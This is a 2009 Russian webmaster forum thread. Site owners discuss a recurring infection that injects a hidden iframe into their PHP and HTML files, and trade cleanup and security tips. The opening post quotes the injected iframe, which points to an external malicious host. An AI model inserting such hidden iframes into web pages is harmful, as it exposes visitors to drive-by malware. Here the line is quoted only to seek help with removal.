С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
 Добавлено: 11/07/09 в 10:10 |
Поймал какуе-то хуйню, заражаются файлы .php .html таким инфреймом
| Код: |
<iframe src="http://a5h.ru:8080/ts/in.cgi?pepsi96" width=125 height=125 style="visibility: hidden"></iframe> |
чищу, но он снова появляется. Лезет в файлы smartcj, progress'a и еще в linkex есть тоже. Как его поймать? все пассы поменял, на фтп тоже 
|
|
|
|
| |
No pain,no gain.
С нами с 12.05.08
Сообщения: 1200
Рейтинг: 1309
|
| Добавлено: 11/07/09 в 11:32 |
У меня тоже этот ублюдок понасырал и на сиджах и на блогах  (во всех файлах где присутствует слово index) Почистил, пароли сменил вроде все ок. Тьфу-Тьфу-Тьфу
|
|
|
|
| |
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
 
|
| Добавлено: 11/07/09 в 11:50 |
Пинать админов, пусть смотрят логи.
|
|
|
|
| |
С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538
|
| Добавлено: 11/07/09 в 12:19 |
|
|
|
|
| |
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
| Добавлено: 11/07/09 в 12:31 |
Yacc: Чё вдруг "никак" ?  Обычно вся эта лажа написана из расчёта "под дефолтный сервак", полюбому видна в логах (если их вести) и исправляется, было б желание ...
|
|
|
|
| |
С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538
|
| Добавлено: 11/07/09 в 13:10 |
Woland: Думаешь, что когда не останется серверов с дефолтными настройками, выключенными логами и ленивыми админами - спамеры и иже с ними сразу вымрут?
Кстати не такая уж это и лажа. А когда она на живом сидже, так это вообще катастрофа.
|
|
|
|
| |
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
| Добавлено: 11/07/09 в 13:15 |
| Цитата: | | Думаешь, что когда не останется серверов с дефолтными настройками, выключенными логами и ленивыми админами |
Кто сказал, что так когда-то будет ?  Но пока оно пишется вот так и особой проблемы отловить обычно нет, было бы желание, о чём я и писал (ну а чё написать - опусти руки, не парься - смысла отлавливать нет ?)
| Цитата: | | Кстати не такая уж это и лажа. А когда она на живом сидже, так это вообще катастрофа. |
Я не трактую слово "лажа", как синоним слова "мелочь" - само-собой это очень херовая вещь, на сидже тем более ...
|
|
|
|
| |
С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538
|
| Добавлено: 11/07/09 в 13:52 |
|
|
|
|
| |
Мотиватор :)
С нами с 06.05.09
Сообщения: 3028
Рейтинг: 607
|
| Добавлено: 11/07/09 в 15:03 |
подобная хрень меня терроризировала одно время, причем хостер говорит установить права на запись только для хозяина, но хрен там. оказалось, что оно дописывается по фтп (т.е троян скачивает - изменяет - закачивает обратно файлы на сервак). а потом нашел статью, где описан этот способ взлома через дыры в CPanel. долго писал в саппорт хостера, а потом они проапгрейдили спанел и всё прекратилось.
|
|
|
|
| |
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
| Добавлено: 11/07/09 в 15:58 |
Панели (особенно популярные, а не качественные, но самописные) вообще зло. И ftp протокол, кстати - тоже
|
|
|
|
| |
С нами с 18.05.09
Сообщения: 571
Рейтинг: 403
|
| Добавлено: 11/07/09 в 17:24 |
а все же какая природа появления вирусов помогите понять более точно?
расхлябанность овнера, которому в падлу поставить антивирус с лицензией?
непредусмотрительность админов хостинга по настройке безопасности?
чаще всего - как появляются вирусы на сиджах?
|
|
|
|
| |
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
| Добавлено: 11/07/09 в 17:37 |
rrr: Дырки в скриптах, особенно популярных, дырки и беспечность в настройках сервера, нежелание отойти на шаг от привычки и озаботиться мерами безопасности (например не юзать ftp вообще, юзать ограничение по IP, юзать не IE, антивирус+файрволл на машине, разные пароли, а не один на всё (мыла, админки, акки), иногда интересоваться содержимым автозагрузки своей винды, а не только тогда, когда уже не можешь работать ну и т.д.).
|
|
|
|
| |
С нами с 18.05.09
Сообщения: 571
Рейтинг: 403
|
| Добавлено: 11/07/09 в 17:42 |
Woland
ну т.е. по сути за редким исключением овнер сам виноват в произошедшем - можно так сказать в заключении?
|
|
|
|
| |
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
| Добавлено: 11/07/09 в 18:05 |
rrr: Нет, наравне с кодерами, которые не всегда утруждаются (или не обладают квалификацией достаточной) думать о безопасности писанного ими кода.
Если в скрипте конкретная дыра, скрипт стал популярным и дыру нашли - овнер в этом никак не виноват и предусмотрительность админов и овнера в плане безопасности не всегда способна помочь при таком раскладе.
|
|
|
|
| |
Добрый ОС :=)
С нами с 12.04.04
Сообщения: 8342
Рейтинг: 3293
|
| Добавлено: 11/07/09 в 19:38 |
Перезалей фсе файлы на хосте, если есть возможность и меняй пассы на фтп. Тоже подобное было - увелы пассы на фтп.
|
|
|
|
| |
Мотиватор :)
С нами с 06.05.09
Сообщения: 3028
Рейтинг: 607
|
| Добавлено: 12/07/09 в 04:12 |
у нас уже давно не юзается фтп, и вайтлист по айпи - но это возможно только на дедике.
|
|
|
|
| |
С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
| Добавлено: 13/07/09 в 00:02 |
бля, насоздавались во всех папках каждого сайта index.php, это пиздец, их там тысячи, как их теперь все удалить что бы нужные не попортить ума не приложу
|
|
|
|
| |
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
| Добавлено: 13/07/09 в 00:07 |
Gidz: По размеру может скриптом, если они маленькие создаются ?
|
|
|
|
| |
С нами с 19.09.03
Сообщения: 1988
Рейтинг: 1247
|
| Добавлено: 13/07/09 в 00:54 |
По дате создания?
upd. По содержимому? 
|
|
|
|
| |
No pain,no gain.
С нами с 12.05.08
Сообщения: 1200
Рейтинг: 1309
|
| Добавлено: 13/07/09 в 01:04 |
| Wahoven писал: | По дате создания?
upd. По содержимому? |
Я по дате у себя все задетектил
|
|
|
|
| |
С нами с 25.03.08
Сообщения: 462
Рейтинг: 75
|
| Добавлено: 14/07/09 в 11:24 |
у меня была такая хрень, трой создавал файл servises.exe в папке систем32, когда его удалил больше ифрейм не появлялся
|
|
|
|
| |
